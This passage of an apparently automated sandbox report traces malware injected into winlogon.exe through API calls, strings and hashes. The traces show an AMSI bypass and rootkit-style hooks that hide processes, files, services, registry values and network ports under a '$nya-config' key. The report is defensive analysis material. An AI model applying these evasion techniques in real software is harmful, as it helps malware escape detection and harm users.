GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750

Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

Analysis Process: winlogon.exePID: 564, Parent PID: 5068COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.7%
Total number of Nodes:	111
Total number of Limit Nodes:	17

Executed Functions

Function 000001E858982C80 Relevance: 13.6, APIs: 9, Instructions: 131
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 000001E858982CAD
TlsGetValue.KERNEL32 ref: 000001E858982CBC
TlsGetValue.KERNEL32 ref: 000001E858982CCB
NtEnumerateValueKey.NTDLL ref: 000001E858982D40
NtEnumerateValueKey.NTDLL ref: 000001E858982D76
NtEnumerateValueKey.NTDLL ref: 000001E858982DB3
TlsSetValue.KERNEL32 ref: 000001E858982E0F
TlsSetValue.KERNEL32 ref: 000001E858982E1E
TlsSetValue.KERNEL32 ref: 000001E858982E2D

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Value$Enumerate
String ID:
API String ID: 3520290360-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 0833e6691694dc9afc731050ea6fb8f24071af9f4e40e4157bf55a395e743196
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 92519E36224682C7E364DB56E844AAEF7A1FB88B84F50413ADE4E43B54DF78C945CF04

Function 000001E858981E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001E858981E47
GetProcAddress.KERNEL32 ref: 000001E858981E57
SleepEx.KERNELBASE ref: 000001E858981E67

Strings

AmsiScanBuffer, xrefs: 000001E858981E50
amsi.dll, xrefs: 000001E858981E40

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 79fbd4b1e2d6ff2d809dd52659f0ebe6e8b782c5e36dc7462948b81879af993b
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 4DD06730632681D6FA187B11EC553EDB263AF64B01FC40477CD0E012A0EE2C8559C750

Function 000001E858981724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001E85898172F
HeapAlloc.KERNEL32 ref: 000001E85898173E

Part of subcall function 000001E858981264: GetProcessHeap.KERNEL32 ref: 000001E85898126A
Part of subcall function 000001E858981264: HeapAlloc.KERNEL32 ref: 000001E858981279
Part of subcall function 000001E858981264: GetProcessHeap.KERNEL32 ref: 000001E858981293
Part of subcall function 000001E858981264: HeapAlloc.KERNEL32 ref: 000001E8589812A4

Part of subcall function 000001E858981000: GetProcessHeap.KERNEL32 ref: 000001E858981006
Part of subcall function 000001E858981000: HeapAlloc.KERNEL32 ref: 000001E858981015
Part of subcall function 000001E858981000: GetProcessHeap.KERNEL32 ref: 000001E858981028
Part of subcall function 000001E858981000: HeapAlloc.KERNEL32 ref: 000001E858981037

RegOpenKeyExW.KERNELBASE ref: 000001E8589817AE
RegOpenKeyExW.KERNELBASE ref: 000001E8589817DB
RegCloseKey.ADVAPI32 ref: 000001E8589817F5
RegOpenKeyExW.KERNELBASE ref: 000001E858981815
RegCloseKey.KERNELBASE ref: 000001E858981830
RegOpenKeyExW.KERNELBASE ref: 000001E858981850
RegCloseKey.ADVAPI32 ref: 000001E85898186B
RegOpenKeyExW.KERNELBASE ref: 000001E85898188B
RegCloseKey.ADVAPI32 ref: 000001E8589818A6
RegOpenKeyExW.KERNELBASE ref: 000001E8589818C6
RegCloseKey.ADVAPI32 ref: 000001E8589818E1
RegOpenKeyExW.KERNELBASE ref: 000001E858981901
RegCloseKey.ADVAPI32 ref: 000001E85898191C
RegOpenKeyExW.KERNELBASE ref: 000001E85898193C
RegCloseKey.ADVAPI32 ref: 000001E858981957
RegOpenKeyExW.KERNELBASE ref: 000001E858981977
RegCloseKey.ADVAPI32 ref: 000001E858981992
RegCloseKey.KERNELBASE ref: 000001E85898199C

Part of subcall function 000001E8589812B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001E858981315
Part of subcall function 000001E8589812B8: GetProcessHeap.KERNEL32 ref: 000001E858981323
Part of subcall function 000001E8589812B8: HeapAlloc.KERNEL32 ref: 000001E858981334
Part of subcall function 000001E8589812B8: RegEnumValueW.ADVAPI32 ref: 000001E858981393
Part of subcall function 000001E8589812B8: GetProcessHeap.KERNEL32 ref: 000001E8589813DB
Part of subcall function 000001E8589812B8: HeapAlloc.KERNEL32 ref: 000001E8589813E9
Part of subcall function 000001E8589812B8: GetProcessHeap.KERNEL32 ref: 000001E858981406
Part of subcall function 000001E8589812B8: HeapFree.KERNEL32 ref: 000001E858981414
Part of subcall function 000001E8589812B8: lstrlenW.KERNEL32 ref: 000001E85898141D
Part of subcall function 000001E8589812B8: GetProcessHeap.KERNEL32 ref: 000001E85898142B
Part of subcall function 000001E8589812B8: HeapAlloc.KERNEL32 ref: 000001E858981439

Strings

SOFTWARE\$nya-config, xrefs: 000001E85898178E
pid, xrefs: 000001E85898180E
startup, xrefs: 000001E8589817D1
tcp_remote, xrefs: 000001E858981935
paths, xrefs: 000001E858981884
udp, xrefs: 000001E858981970
tcp_local, xrefs: 000001E8589818FA
process_names, xrefs: 000001E858981849
service_names, xrefs: 000001E8589818BF

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: c42f270a00c6135dc1a9ecc6a12cf34b70f95b24d6027914614f5413ef0ea847
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 6571E836721A91C6EB20AF76E8916DDB3A5FF84B88F401122DE4E57B68EF38C544C740

Function 000001E858981E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001E858981E7F

Part of subcall function 000001E8589822A8: GetModuleHandleA.KERNEL32(?,?,?,000001E858981EB1), ref: 000001E8589822C0
Part of subcall function 000001E8589822A8: GetProcAddress.KERNEL32(?,?,?,000001E858981EB1), ref: 000001E8589822D1

CreateThread.KERNELBASE ref: 000001E858982043
TlsAlloc.KERNEL32 ref: 000001E858982049
TlsAlloc.KERNEL32 ref: 000001E858982055
TlsAlloc.KERNEL32 ref: 000001E858982061
TlsAlloc.KERNEL32 ref: 000001E85898206D
TlsAlloc.KERNEL32 ref: 000001E858982079
TlsAlloc.KERNEL32 ref: 000001E858982085

Strings

EnumServicesStatusExW, xrefs: 000001E858981F71, 000001E858981F92
sechost.dll, xrefs: 000001E858981F99
PdhGetFormattedCounterArrayW, xrefs: 000001E858981FF1
NtDeviceIoControlFile, xrefs: 000001E858981FB6
ntdll.dll, xrefs: 000001E858981E8D
NtEnumerateValueKey, xrefs: 000001E858981F36
NtEnumerateKey, xrefs: 000001E858981F19
NtQueryDirectoryFile, xrefs: 000001E858981EDF
NtQueryDirectoryFileEx, xrefs: 000001E858981EFC
AmsiScanBuffer, xrefs: 000001E858982012
advapi32.dll, xrefs: 000001E858981F57, 000001E858981F78
EnumServiceGroupW, xrefs: 000001E858981F50
NtResumeThread, xrefs: 000001E858981EC2
PdhGetRawCounterArrayW, xrefs: 000001E858981FD0
pdh.dll, xrefs: 000001E858981FD7, 000001E858981FF8
NtQuerySystemInformation, xrefs: 000001E858981EA5
amsi.dll, xrefs: 000001E858982019

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 752fe234c95ab1fb3c1fa53d8dc745e5f0498f0841882d0054117479748036ef
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 7D515C74630ACAE6EB14EFA4EC557DCF722AF44748FC049339C0E46565EE78825ACB84

Function 000001E85898EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001E85898F34A,?,?,00000000,000001E85898F2CD), ref: 000001E85898EFF5
GetLastError.KERNEL32(?,?,00000000,000001E85898F2CD), ref: 000001E85898F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001E85898F2CD), ref: 000001E85898F049
VirtualProtect.KERNELBASE ref: 000001E85898F0A5
VirtualProtect.KERNEL32 ref: 000001E85898F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001E85898F2CD), ref: 000001E85898F11A
GetProcAddress.KERNEL32(?,?,00000000,000001E85898F2CD), ref: 000001E85898F126

Strings

api-ms-, xrefs: 000001E85898F01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001E85898F157, 000001E85898F165
ext-ms-, xrefs: 000001E85898F02E

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 200edfd6bcf0b3a0727e3d76c87f312e318cca55a30b54c9bbf3568c39774df1
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 5F51BA31721B86D5EA249F66E8403EEB291AF48BB0F5817369E3E477D1EF38D445CA40

Function 000001E858986270 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589862AB
GetThreadContext.KERNEL32 ref: 000001E858986415

Part of subcall function 000001E8589860A0: GetCurrentThreadId.KERNEL32 ref: 000001E8589860A4

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 2ff11c1be90479a1e6cf58369367b5af2ea5d024f86bdfb82a75ac5a15ce7897
Instruction ID: 46800f2f999124dcc45fd1d2e9341ff6952696380e717fe7da1eb633ac595a53
Opcode Fuzzy Hash: 2ff11c1be90479a1e6cf58369367b5af2ea5d024f86bdfb82a75ac5a15ce7897
Instruction Fuzzy Hash: 7BD16876215BC9C5DA719B1AE49439EB7A0FBC8B88F100126EE8D477A5DF39C551CF00

Function 000001E858985810 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E858985896

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d1efe80aa896adf56c352d5c0170c98584534c44e36adba6730078e70e045cb7
Instruction ID: 522768cb9165ebf6b748bb36accd7d408afbd4fcefcdb0d12c946d5185b2e25b
Opcode Fuzzy Hash: d1efe80aa896adf56c352d5c0170c98584534c44e36adba6730078e70e045cb7
Instruction Fuzzy Hash: C2029736229BC5C6EB608B55E49439EF7A0F7C4794F104126EA8E87BA9DF79C454CF00

Function 000001E858983EC8 Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F0E
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F47
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F68

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 6504a226cbacb16d08a7b617b85923eab210ee2dc2f24c4c3955bc1a6d9ff664
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 9811E936625781D3EB249B21E44429EB7B1FB49B84F044136DE4E037A8EF7EC9558B84

Function 000001E858952EBC Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001E858952F7B
VirtualProtect.KERNELBASE ref: 000001E858952FA5
LoadLibraryA.KERNELBASE ref: 000001E85895302E
VirtualProtect.KERNELBASE ref: 000001E8589531C2

Memory Dump Source

Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd

Similarity

API ID: Virtual$Protect$AllocLibraryLoad
String ID:
API String ID: 3316853933-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 3f3cb9d7b2f1dd9ccec39938e4baec1c2a0f0d8bc3636168fed7f0637dd6811c
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: B991E072B21690C7EB648F25E500BADF391FF55B9AF5481369E4E07B88DE38E812D710

Function 000001E858984120 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001E8589841A6
VirtualAlloc.KERNEL32 ref: 000001E8589841E0

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction ID: c74ab8962380babd794f7717a11efdf38a3ab2787b6864ecae9c648994eb6fbb
Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction Fuzzy Hash: 2F31FD72229AC1C1EA30DA55E45439EF2A4FB99788F100536E9CE46BA8DF7CC5908F44

Function 000001E858983A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001E858983A35
PathFindFileNameW.SHLWAPI ref: 000001E858983A44

Part of subcall function 000001E858983F88: StrCmpNIW.SHLWAPI(?,?,?,000001E85898272F), ref: 000001E858983FA0

Part of subcall function 000001E858983EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983EDB
Part of subcall function 000001E858983EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F0E
Part of subcall function 000001E858983EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F2E
Part of subcall function 000001E858983EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F47
Part of subcall function 000001E858983EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F68

CreateThread.KERNELBASE ref: 000001E858983A8B

Part of subcall function 000001E858981E74: GetCurrentThread.KERNEL32 ref: 000001E858981E7F
Part of subcall function 000001E858981E74: CreateThread.KERNELBASE ref: 000001E858982043
Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982049
Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982055
Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982061
Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E85898206D
Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982079
Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982085

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: df8c3281ef722b2b116e46804060982d6179dc25a9d7c515466c6086f327f8dd
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 8B115A316306C3D6FB60A720E9497EEF2A1AF94349F90413B9C1E815D1EF7CC558AA00

Function 000001E858985530 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001E858985534
VirtualProtect.KERNEL32 ref: 000001E858985577
FlushInstructionCache.KERNEL32 ref: 000001E85898558C

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 8659059d713f10fb2b36df29fda00c285aebd80b25688c8f1dc0718561e99dbb
Instruction ID: c00648d99bde74b6e8437f54283572133123305961822debd08496dc2ccf2da5
Opcode Fuzzy Hash: 8659059d713f10fb2b36df29fda00c285aebd80b25688c8f1dc0718561e99dbb
Instruction Fuzzy Hash: 68F0B776629A85C4D630DB15E46179EB7A1EBC8BD4F144126BE8D07B69CE38C6848F00

Function 000001E858981BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001E858981724: GetProcessHeap.KERNEL32 ref: 000001E85898172F
